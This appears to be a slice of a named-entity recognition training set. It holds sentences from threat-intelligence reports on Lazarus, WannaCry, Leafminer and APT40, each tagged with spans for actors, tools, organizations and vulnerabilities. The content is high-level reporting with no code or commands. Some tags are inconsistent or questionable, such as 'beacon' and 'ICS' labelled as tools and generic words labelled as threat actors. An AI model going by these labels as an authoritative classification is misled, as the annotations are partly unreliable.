{"text": "Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service .", "spans": {"THREAT_ACTOR: Lazarus actors": [[0, 14]]}, "info": {"id": "dnrti_train_000628", "source": "dnrti_train"}}
{"text": "Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL .", "spans": {"ORGANIZATION: U.S. Government": [[13, 28], [144, 159]], "ORGANIZATION: DHS": [[40, 43]], "ORGANIZATION: FBI": [[48, 51]], "TOOL: Trojan malware": [[63, 77]]}, "info": {"id": "dnrti_train_000629", "source": "dnrti_train"}}
{"text": "The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP port 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications .", "spans": {"TOOL: custom binary protocol": [[19, 41]], "TOOL: beacon": [[45, 51]], "TOOL: Secure Socket Layer": [[166, 185]], "TOOL: SSL": [[188, 191]]}, "info": {"id": "dnrti_train_000630", "source": "dnrti_train"}}
{"text": "DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "ORGANIZATION: FBI": [[8, 11]]}, "info": {"id": "dnrti_train_000631", "source": "dnrti_train"}}
{"text": "The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal .", "spans": {"TOOL: RATANKBA": [[21, 29]], "THREAT_ACTOR: Lazarus": [[60, 67]]}, "info": {"id": "dnrti_train_000632", "source": "dnrti_train"}}
{"text": "We analyzed a new RATANKBA variant ( BKDR_RATANKBA.ZAEL–A ) , discovered in June 2017 , that uses a PowerShell script instead of its more traditional PE executable form—a version that other researchers also recently identified .", "spans": {"TOOL: RATANKBA": [[18, 26]], "TOOL: BKDR_RATANKBA.ZAEL–A": [[37, 57]], "TOOL: PowerShell script": [[100, 117]]}, "info": {"id": "dnrti_train_000633", "source": "dnrti_train"}}
{"text": "Around 55% of the victims of Lazarus were located in India and neighboring countries .", "spans": {"THREAT_ACTOR: Lazarus": [[29, 36]]}, "info": {"id": "dnrti_train_000634", "source": "dnrti_train"}}
{"text": "Lazarus group could have been active since late 2016 , was used in a recent campaign targeting financial institutions using watering hole attacks .", "spans": {"THREAT_ACTOR: Lazarus group": [[0, 13]], "ORGANIZATION: financial institutions": [[95, 117]]}, "info": {"id": "dnrti_train_000635", "source": "dnrti_train"}}
{"text": "Since they first emerged back in 2007 with a series of cyberespionage attacks against the South Korean government , these threat actors have successfully managed to pull off some of the most notable and devastating targeted attacks—such as the widely-reported 2014 Sony hack and the 2016 attack on a Bangladeshi bank—in recent history .", "spans": {"THREAT_ACTOR: threat actors": [[122, 135]]}, "info": {"id": "dnrti_train_000636", "source": "dnrti_train"}}
{"text": "It 's possible that Lazarus is using RATANKBA to target larger organizations .", "spans": {"THREAT_ACTOR: Lazarus": [[20, 27]], "TOOL: RATANKBA": [[37, 45]]}, "info": {"id": "dnrti_train_000637", "source": "dnrti_train"}}
{"text": "RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders .", "spans": {"TOOL: RATANKBA": [[0, 8]], "TOOL: Microsoft Office documents": [[83, 109]], "TOOL: CHM files": [[122, 131]]}, "info": {"id": "dnrti_train_000638", "source": "dnrti_train"}}
{"text": "Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses .", "spans": {"THREAT_ACTOR: Lazarus": [[74, 81]], "THREAT_ACTOR: groups": [[100, 106]], "THREAT_ACTOR: cybercriminals": [[123, 137]]}, "info": {"id": "dnrti_train_000639", "source": "dnrti_train"}}
{"text": "simultaneous use of the detected Win32/KillDisk.NBO variants .", "spans": {"TOOL: Win32/KillDisk.NBO": [[33, 51]]}, "info": {"id": "dnrti_train_000640", "source": "dnrti_train"}}
{"text": "Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government – commonly known as HARDRAIN .", "spans": {"ORGANIZATION: U.S. Government": [[13, 28]], "ORGANIZATION: DHS": [[40, 43]], "ORGANIZATION: FBI": [[48, 51]], "TOOL: Trojan malware": [[63, 77]], "TOOL: HARDRAIN": [[143, 151]]}, "info": {"id": "dnrti_train_000641", "source": "dnrti_train"}}
{"text": "These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections .", "spans": {"TOOL: RATs": [[108, 112]]}, "info": {"id": "dnrti_train_000642", "source": "dnrti_train"}}
{"text": "The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America .", "spans": {"THREAT_ACTOR: cybercriminal group": [[4, 23]], "THREAT_ACTOR: Lazarus": [[24, 31]], "ORGANIZATION: financial organizations": [[59, 82]]}, "info": {"id": "dnrti_train_000643", "source": "dnrti_train"}}
{"text": "We also recently discovered that Lazarus successfully planted their backdoor ( detected by Trend Micro as BKDR_BINLODR.ZNFJ-A ) into several machines of financial institutions across Latin America .", "spans": {"THREAT_ACTOR: Lazarus": [[33, 40]], "ORGANIZATION: Trend Micro": [[91, 102]], "TOOL: BKDR_BINLODR.ZNFJ-A": [[106, 125]], "ORGANIZATION: financial institutions": [[153, 175]]}, "info": {"id": "dnrti_train_000644", "source": "dnrti_train"}}
{"text": "We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component .", "spans": {}, "info": {"id": "dnrti_train_000645", "source": "dnrti_train"}}
{"text": "Just last week Lazarus were found stealing millions from ATMs across Asia and Africa .", "spans": {"THREAT_ACTOR: Lazarus": [[15, 22]]}, "info": {"id": "dnrti_train_000646", "source": "dnrti_train"}}
{"text": "These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization .", "spans": {"THREAT_ACTOR: Lazarus group": [[34, 47]]}, "info": {"id": "dnrti_train_000647", "source": "dnrti_train"}}
{"text": "The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more .", "spans": {"THREAT_ACTOR: Lazarus": [[14, 21]], "THREAT_ACTOR: attackers": [[139, 148]]}, "info": {"id": "dnrti_train_000648", "source": "dnrti_train"}}
{"text": "Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "ORGANIZATION: Trend Micro™ Smart Protection Suites": [[39, 75]], "ORGANIZATION: Worry-Free™ Business Security": [[80, 109]], "MALWARE: malicious files": [[175, 190]]}, "info": {"id": "dnrti_train_000649", "source": "dnrti_train"}}
{"text": "FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation .", "spans": {"ORGANIZATION: FBI": [[0, 3]], "THREAT_ACTOR: HIDDEN COBRA actors": [[29, 48]]}, "info": {"id": "dnrti_train_000650", "source": "dnrti_train"}}
{"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others .", "spans": {"TOOL: WannaCry": [[42, 50]], "TOOL: WCry": [[57, 61]], "TOOL: WanaCrypt0r": [[69, 80]]}, "info": {"id": "dnrti_train_000651", "source": "dnrti_train"}}
{"text": "We also saw that the attack technique bears some resemblance to a previous 2017 Lazarus attack , analyzed by BAE Systems , against targets in Asia .", "spans": {"ORGANIZATION: BAE Systems": [[109, 120]]}, "info": {"id": "dnrti_train_000653", "source": "dnrti_train"}}
{"text": "WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system .", "spans": {"TOOL: WannaCry": [[0, 8]], "VULNERABILITY: EternalBlue": [[18, 29]], "TOOL: SMB": [[51, 54]]}, "info": {"id": "dnrti_train_000654", "source": "dnrti_train"}}
{"text": "WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 .", "spans": {"TOOL: WannaCry": [[0, 8]], "TOOL: WCry": [[25, 29]], "TOOL: WanaCryptor": [[33, 44]], "TOOL: ransomware": [[91, 101]], "ORGANIZATION: Microsoft": [[203, 212]], "TOOL: Server Message Block": [[216, 236]], "TOOL: SMB": [[239, 242]]}, "info": {"id": "dnrti_train_000656", "source": "dnrti_train"}}
{"text": "The WannaCry malware consists of two distinct components , one that provides ransomware functionality and a component used for propagation , which contains functionality to enable SMB exploitation capabilities .", "spans": {"TOOL: WannaCry malware": [[4, 20]], "TOOL: SMB": [[180, 183]]}, "info": {"id": "dnrti_train_000657", "source": "dnrti_train"}}
{"text": "WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"TOOL: WannaCry": [[0, 8]], "VULNERABILITY: EternalBlue": [[44, 55]], "THREAT_ACTOR: Shadow Brokers": [[85, 99]]}, "info": {"id": "dnrti_train_000658", "source": "dnrti_train"}}
{"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data .", "spans": {"TOOL: WannaCry": [[0, 8]], "MALWARE: .WCRY": [[47, 52]]}, "info": {"id": "dnrti_train_000659", "source": "dnrti_train"}}
{"text": "In May 2017 , SecureWorks® Counter Threat Unit® ( CTU ) researchers investigated a widespread and opportunistic WCry ( also known as WanaCry , WanaCrypt , and Wana Decrypt0r ) ransomware campaign that impacted many systems around the world .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit®": [[14, 47]], "ORGANIZATION: CTU": [[50, 53]], "TOOL: WCry": [[112, 116]]}, "info": {"id": "dnrti_train_000660", "source": "dnrti_train"}}
{"text": "In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[19, 50]], "ORGANIZATION: CTU": [[53, 56]]}, "info": {"id": "dnrti_train_000661", "source": "dnrti_train"}}
{"text": "Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "VULNERABILITY: SMBv1 vulnerabilities": [[24, 45]]}, "info": {"id": "dnrti_train_000662", "source": "dnrti_train"}}
{"text": "The worm leverages an SMBv1 exploit that originates from tools released by the Shadow Brokers threat group in April .", "spans": {"VULNERABILITY: SMBv1 exploit": [[22, 35]], "THREAT_ACTOR: Shadow Brokers": [[79, 93]], "THREAT_ACTOR: threat group": [[94, 106]]}, "info": {"id": "dnrti_train_000663", "source": "dnrti_train"}}
{"text": "If the DoublePulsar backdoor does not exist , then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit .", "spans": {"TOOL: DoublePulsar backdoor": [[7, 28]], "TOOL: SMB worm": [[55, 63]], "VULNERABILITY: Eternalblue SMBv1 exploit": [[108, 133]]}, "info": {"id": "dnrti_train_000664", "source": "dnrti_train"}}
{"text": "WCry uses a combination of the RSA and AES algorithms to encrypt files .", "spans": {"TOOL: WCry": [[0, 4]], "TOOL: RSA": [[31, 34]], "TOOL: AES": [[39, 42]]}, "info": {"id": "dnrti_train_000665", "source": "dnrti_train"}}
{"text": "The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence .", "spans": {"TOOL: SMB worm": [[26, 34]], "TOOL: WCry": [[49, 53]]}, "info": {"id": "dnrti_train_000666", "source": "dnrti_train"}}
{"text": "Last week Microsoft , working together with Facebook and others in the security community , took strong steps to protect our customers and the internet from ongoing attacks by an advanced persistent threat actor known to us as ZINC , also known as the Lazarus Group .", "spans": {"ORGANIZATION: Microsoft": [[10, 19]], "ORGANIZATION: Facebook": [[44, 52]], "ORGANIZATION: security community": [[71, 89]], "THREAT_ACTOR: threat actor": [[199, 211]], "THREAT_ACTOR: ZINC": [[227, 231]], "THREAT_ACTOR: Lazarus Group": [[252, 265]]}, "info": {"id": "dnrti_train_000667", "source": "dnrti_train"}}
{"text": "Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group .", "spans": {"ORGANIZATION: Microsoft": [[10, 19]], "ORGANIZATION: Facebook": [[44, 52]], "THREAT_ACTOR: Lazarus Group": [[143, 156]]}, "info": {"id": "dnrti_train_000668", "source": "dnrti_train"}}
{"text": "We concluded that Lazarus Group was responsible for WannaCry , a destructive malware .", "spans": {"THREAT_ACTOR: Lazarus Group": [[18, 31]], "TOOL: WannaCry": [[52, 60]]}, "info": {"id": "dnrti_train_000669", "source": "dnrti_train"}}
{"text": "We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": {"THREAT_ACTOR: Lazarus Group": [[18, 31]], "TOOL: WannaCry": [[52, 60]], "ORGANIZATION: Microsoft customers": [[105, 124]]}, "info": {"id": "dnrti_train_000670", "source": "dnrti_train"}}
{"text": "Today , the governments of the United States , United Kingdom , Australia , Canada , New Zealand and Japan have all announced that the government of North Korea is responsible for the activities of ZINC/Lazarus .", "spans": {"THREAT_ACTOR: ZINC/Lazarus": [[198, 210]]}, "info": {"id": "dnrti_train_000671", "source": "dnrti_train"}}
{"text": "In November 2017 , Secureworks Counter Threat Unit™ ( CTU ) researchers discovered the North Korean cyber threat group , known as Lazarus Group and internally tracked as NICKEL ACADEMY by Secureworks , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": {"ORGANIZATION: Secureworks Counter Threat Unit™": [[19, 51]], "ORGANIZATION: CTU": [[54, 57]], "THREAT_ACTOR: cyber threat group": [[100, 118]], "THREAT_ACTOR: Lazarus Group": [[130, 143]], "THREAT_ACTOR: NICKEL ACADEMY": [[170, 184]], "ORGANIZATION: Secureworks": [[188, 199]], "ORGANIZATION: cryptocurrency company": [[319, 341]]}, "info": {"id": "dnrti_train_000672", "source": "dnrti_train"}}
{"text": "In November 2017 , CTU researchers discovered the North Korean cyber threat group , known as Lazarus Group , had launched a malicious spearphishing campaign using the lure of a job opening for the CFO role at a European-based cryptocurrency company .", "spans": {"ORGANIZATION: CTU": [[19, 22]], "THREAT_ACTOR: cyber threat group": [[63, 81]], "THREAT_ACTOR: Lazarus Group": [[93, 106]], "ORGANIZATION: cryptocurrency company": [[226, 248]]}, "info": {"id": "dnrti_train_000673", "source": "dnrti_train"}}
{"text": "Bankshot is designed to persist on a victim 's network for further exploitation ; thus the Advanced Threat Research team believes this operation is intended to gain access to specific financial organizations .", "spans": {"TOOL: Bankshot": [[0, 8]], "ORGANIZATION: Advanced Threat Research": [[91, 115]], "ORGANIZATION: financial organizations": [[184, 207]]}, "info": {"id": "dnrti_train_000674", "source": "dnrti_train"}}
{"text": "CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "dnrti_train_000675", "source": "dnrti_train"}}
{"text": "CTU researchers have observed NICKEL ACADEMY ( Lazarus ) copying and pasting job descriptions from online recruitment sites in previous campaigns .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: NICKEL ACADEMY": [[30, 44]], "THREAT_ACTOR: Lazarus": [[47, 54]]}, "info": {"id": "dnrti_train_000676", "source": "dnrti_train"}}
{"text": "There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign .", "spans": {"ORGANIZATION: CTU": [[46, 49]], "THREAT_ACTOR: NICKEL ACADEMY": [[99, 113]]}, "info": {"id": "dnrti_train_000677", "source": "dnrti_train"}}
{"text": "CTU researchers also identified components in the custom C2 protocol being used which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "TOOL: custom C2 protocol": [[50, 68]], "THREAT_ACTOR: Nickel Academy": [[113, 127]], "THREAT_ACTOR: Lazarus": [[130, 137]]}, "info": {"id": "dnrti_train_000678", "source": "dnrti_train"}}
{"text": "CTU researchers also identified components in the custom C2 protocol being used ( the way in which the malware talks to the Command and Control Servers ) which they have seen utilized by Nickel Academy ( Lazarus ) previously .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "TOOL: custom C2 protocol": [[50, 68]], "THREAT_ACTOR: Nickel Academy": [[187, 201]], "THREAT_ACTOR: Lazarus": [[204, 211]]}, "info": {"id": "dnrti_train_000679", "source": "dnrti_train"}}
{"text": "The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group .", "spans": {"TOOL: RAT": [[90, 93]], "THREAT_ACTOR: NICKEL ACADEMY": [[147, 161]], "THREAT_ACTOR: Lazarus": [[164, 171]], "THREAT_ACTOR: threat group": [[174, 186]]}, "info": {"id": "dnrti_train_000681", "source": "dnrti_train"}}
{"text": "During our investigation , there was a breakthrough discovery that helped connect Leafminer to a number of attacks observed on systems in the Middle East and identify the toolkit used in the group 's efforts of intrusion , lateral movement , and exfiltration .", "spans": {"THREAT_ACTOR: Leafminer": [[82, 91]], "THREAT_ACTOR: group": [[191, 196]]}, "info": {"id": "dnrti_train_000682", "source": "dnrti_train"}}
{"text": "As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer .", "spans": {"TOOL: public web shell": [[103, 119]], "THREAT_ACTOR: Leafminer": [[135, 144]]}, "info": {"id": "dnrti_train_000683", "source": "dnrti_train"}}
{"text": "As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers .", "spans": {"TOOL: public web shell": [[103, 119]], "THREAT_ACTOR: attackers": [[135, 144]]}, "info": {"id": "dnrti_train_000684", "source": "dnrti_train"}}
{"text": "The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems .", "spans": {"THREAT_ACTOR: Leafminer": [[4, 13], [55, 64]]}, "info": {"id": "dnrti_train_000685", "source": "dnrti_train"}}
{"text": "Researching the hacker handle MagicCoder results in references to the Iranian hacking forum Ashiyane as well as defacements by the Iranian hacker group Sun Army .", "spans": {"THREAT_ACTOR: hacker": [[16, 22]], "THREAT_ACTOR: Ashiyane": [[92, 100]], "THREAT_ACTOR: hacker group": [[139, 151]], "THREAT_ACTOR: Sun Army": [[152, 160]]}, "info": {"id": "dnrti_train_000686", "source": "dnrti_train"}}
{"text": "Targeted regions included in the list of Leafminer are Saudi Arabia , United Arab Emirates , Qatar , Kuwait , Bahrain , Egypt , Israel , and Afghanistan .", "spans": {"THREAT_ACTOR: Leafminer": [[41, 50]]}, "info": {"id": "dnrti_train_000687", "source": "dnrti_train"}}
{"text": "Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East .", "spans": {"THREAT_ACTOR: Leafminer": [[21, 30]], "TOOL: JavaScript code": [[61, 76]], "TOOL: compromised websites": [[88, 108]]}, "info": {"id": "dnrti_train_000688", "source": "dnrti_train"}}
{"text": "This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 .", "spans": {"TOOL: Fuzzbunch": [[18, 27]], "THREAT_ACTOR: Shadow Brokers": [[101, 115]]}, "info": {"id": "dnrti_train_000689", "source": "dnrti_train"}}
{"text": "Leafminer has developed exploit payloads for this framework ( Table 2 ) that deliver custom malware through attacks against SMB vulnerabilities described by Microsoft .", "spans": {"THREAT_ACTOR: Leafminer": [[0, 9]], "VULNERABILITY: SMB vulnerabilities": [[124, 143]], "ORGANIZATION: Microsoft": [[157, 166]]}, "info": {"id": "dnrti_train_000690", "source": "dnrti_train"}}
{"text": "The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"VULNERABILITY: EternalBlue exploit": [[4, 23]], "TOOL: Petya": [[137, 142]], "TOOL: NotPetya": [[145, 153]]}, "info": {"id": "dnrti_train_000691", "source": "dnrti_train"}}
{"text": "The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": {"THREAT_ACTOR: Leafminer": [[4, 13]], "THREAT_ACTOR: operators": [[14, 23]], "VULNERABILITY: EternalBlue": [[28, 39]]}, "info": {"id": "dnrti_train_000692", "source": "dnrti_train"}}
{"text": "Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Leafminer": [[35, 44]], "VULNERABILITY: Heartbleed vulnerability": [[61, 85]], "VULNERABILITY: CVE-2014-0160": [[88, 101]]}, "info": {"id": "dnrti_train_000693", "source": "dnrti_train"}}
{"text": "Furthermore , the Leafminer arsenal server hosted a Python script to scan for this vulnerability .", "spans": {"THREAT_ACTOR: Leafminer": [[18, 27]], "TOOL: Python script": [[52, 65]]}, "info": {"id": "dnrti_train_000694", "source": "dnrti_train"}}
{"text": "Another intrusion approach used by Leafminer seems a lot less sophisticated than the previously described methods but can be just as effective : using specific hacktools to guess the login passwords for services exposed by a targeted system .", "spans": {"THREAT_ACTOR: Leafminer": [[35, 44]], "TOOL: hacktools": [[160, 169]]}, "info": {"id": "dnrti_train_000695", "source": "dnrti_train"}}
{"text": "Commands found in a readme text that was stored in a ZIP archive together with the hacktool THC Hydra in Leafminer 's tool arsenal represent online dictionary attacks on Microsoft Exchange and Remote Desktop Protocol services of regional government servers in Saudi Arabia .", "spans": {"TOOL: THC Hydra": [[92, 101]], "THREAT_ACTOR: Leafminer": [[105, 114]]}, "info": {"id": "dnrti_train_000696", "source": "dnrti_train"}}
{"text": "Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Leafminer group": [[62, 77]], "TOOL: Trojan.Imecab": [[80, 93]], "TOOL: Backdoor.Sorgu": [[98, 112]]}, "info": {"id": "dnrti_train_000697", "source": "dnrti_train"}}
{"text": "Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East .", "spans": {"THREAT_ACTOR: Leafminer": [[0, 9]], "THREAT_ACTOR: group": [[29, 34]]}, "info": {"id": "dnrti_train_000698", "source": "dnrti_train"}}
{"text": "Leafminer appears to be based in Iran and seems to be eager to learn from and capitalize on tools and techniques used by more advanced threat actors .", "spans": {"THREAT_ACTOR: Leafminer": [[0, 9]], "THREAT_ACTOR: threat actors": [[135, 148]]}, "info": {"id": "dnrti_train_000699", "source": "dnrti_train"}}
{"text": "Dragos has identified Leafminer group targeting access operations in the electric utility sector .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: Leafminer group": [[22, 37]], "ORGANIZATION: electric utility sector": [[73, 96]]}, "info": {"id": "dnrti_train_000701", "source": "dnrti_train"}}
{"text": "Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 .", "spans": {"THREAT_ACTOR: RASPITE": [[12, 19]], "THREAT_ACTOR: group": [[80, 85]]}, "info": {"id": "dnrti_train_000702", "source": "dnrti_train"}}
{"text": "RASPITE targeting includes entities in the US , Middle East , Europe , and East Asia .", "spans": {"THREAT_ACTOR: RASPITE": [[0, 7]]}, "info": {"id": "dnrti_train_000703", "source": "dnrti_train"}}
{"text": "RASPITE overlaps significantly with Symantec 's Leafminer , which recently released a report on the group 's activity in the Middle East .", "spans": {"THREAT_ACTOR: RASPITE": [[0, 7]], "ORGANIZATION: Symantec": [[36, 44]], "THREAT_ACTOR: Leafminer": [[48, 57]], "THREAT_ACTOR: group": [[100, 105]]}, "info": {"id": "dnrti_train_000704", "source": "dnrti_train"}}
{"text": "RASPITE 's activity to date currently focuses on initial access operations within the electric utility sector .", "spans": {"THREAT_ACTOR: RASPITE": [[0, 7]], "ORGANIZATION: electric utility sector": [[86, 109]]}, "info": {"id": "dnrti_train_000705", "source": "dnrti_train"}}
{"text": "This means that the Leafminer group is targeting electric utilities .", "spans": {"THREAT_ACTOR: Leafminer group": [[20, 35]], "ORGANIZATION: electric utilities": [[49, 67]]}, "info": {"id": "dnrti_train_000706", "source": "dnrti_train"}}
{"text": "While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the way for later potential ICS events .", "spans": {"THREAT_ACTOR: group": [[10, 15]], "TOOL: ICS": [[44, 47], [245, 248]], "THREAT_ACTOR: RASPITE": [[61, 68]]}, "info": {"id": "dnrti_train_000707", "source": "dnrti_train"}}
{"text": "Active since at least 2014 , this actor has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": {"THREAT_ACTOR: actor": [[34, 39]], "ORGANIZATION: naval defense contractors": [[92, 117]], "ORGANIZATION: research institutions": [[135, 156]]}, "info": {"id": "dnrti_train_000708", "source": "dnrti_train"}}
{"text": "Active since at least 2014 , the Leviathan has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": {"THREAT_ACTOR: Leviathan": [[33, 42]], "ORGANIZATION: naval defense contractors": [[95, 120]], "ORGANIZATION: research institutions": [[138, 159]]}, "info": {"id": "dnrti_train_000709", "source": "dnrti_train"}}
{"text": "The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": {"VULNERABILITY: CVE-2017-8759": [[26, 39]]}, "info": {"id": "dnrti_train_000711", "source": "dnrti_train"}}
{"text": "The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": {"THREAT_ACTOR: Leviathan": [[4, 13]], "MALWARE: macro-laden Microsoft Word documents": [[37, 73]], "ORGANIZATION: development organizations": [[106, 131]]}, "info": {"id": "dnrti_train_000715", "source": "dnrti_train"}}
{"text": "The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor .", "spans": {"ORGANIZATION: Proofpoint": [[95, 105]], "THREAT_ACTOR: actor": [[156, 161]]}, "info": {"id": "dnrti_train_000716", "source": "dnrti_train"}}
{"text": "The Leviathan , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": {"THREAT_ACTOR: Leviathan": [[4, 13]]}, "info": {"id": "dnrti_train_000717", "source": "dnrti_train"}}
{"text": "This actor , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": {"THREAT_ACTOR: actor": [[5, 10]]}, "info": {"id": "dnrti_train_000718", "source": "dnrti_train"}}
{"text": "The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013 , dubbed TEMP.Periscope .", "spans": {"THREAT_ACTOR: group": [[28, 33]], "THREAT_ACTOR: cyber espionage actors": [[55, 77]], "THREAT_ACTOR: TEMP.Periscope": [[114, 128]]}, "info": {"id": "dnrti_train_000719", "source": "dnrti_train"}}
{"text": "The current campaign is a sharp escalation of detected activity since summer 2017 .", "spans": {}, "info": {"id": "dnrti_train_000721", "source": "dnrti_train"}}
{"text": "Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues .", "spans": {"ORGANIZATION: FireEye": [[19, 26], [43, 50]], "ORGANIZATION: Mandiant Consulting": [[75, 94]], "ORGANIZATION: iSIGHT Intelligence": [[101, 120]], "ORGANIZATION: maritime entities": [[203, 220]]}, "info": {"id": "dnrti_train_000722", "source": "dnrti_train"}}
{"text": "Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States .", "spans": {"THREAT_ACTOR: Leviathan": [[21, 30]], "ORGANIZATION: research institutes": [[81, 100]], "ORGANIZATION: academic organizations": [[103, 125]], "ORGANIZATION: private firms": [[132, 145]]}, "info": {"id": "dnrti_train_000723", "source": "dnrti_train"}}
{"text": "Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[29, 43]], "ORGANIZATION: engineering firms": [[132, 149]], "ORGANIZATION: government offices": [[208, 226]]}, "info": {"id": "dnrti_train_000724", "source": "dnrti_train"}}
{"text": "TEMP.Periscope overlaps in targeting , as well as tactics , techniques , and procedures ( TTPs ) , with TEMP.Jumper , a group that also overlaps significantly with public reporting on NanHaiShu .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[0, 14]], "THREAT_ACTOR: TEMP.Jumper": [[104, 115]], "THREAT_ACTOR: group": [[120, 125]], "TOOL: NanHaiShu": [[184, 193]]}, "info": {"id": "dnrti_train_000725", "source": "dnrti_train"}}
{"text": "The actor has conducted operations since at least 2013 in support of China 's naval modernization effort .", "spans": {"THREAT_ACTOR: actor": [[4, 9]]}, "info": {"id": "dnrti_train_000726", "source": "dnrti_train"}}
{"text": "FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: actor": [[155, 160]], "THREAT_ACTOR: APT40": [[169, 174]]}, "info": {"id": "dnrti_train_000727", "source": "dnrti_train"}}
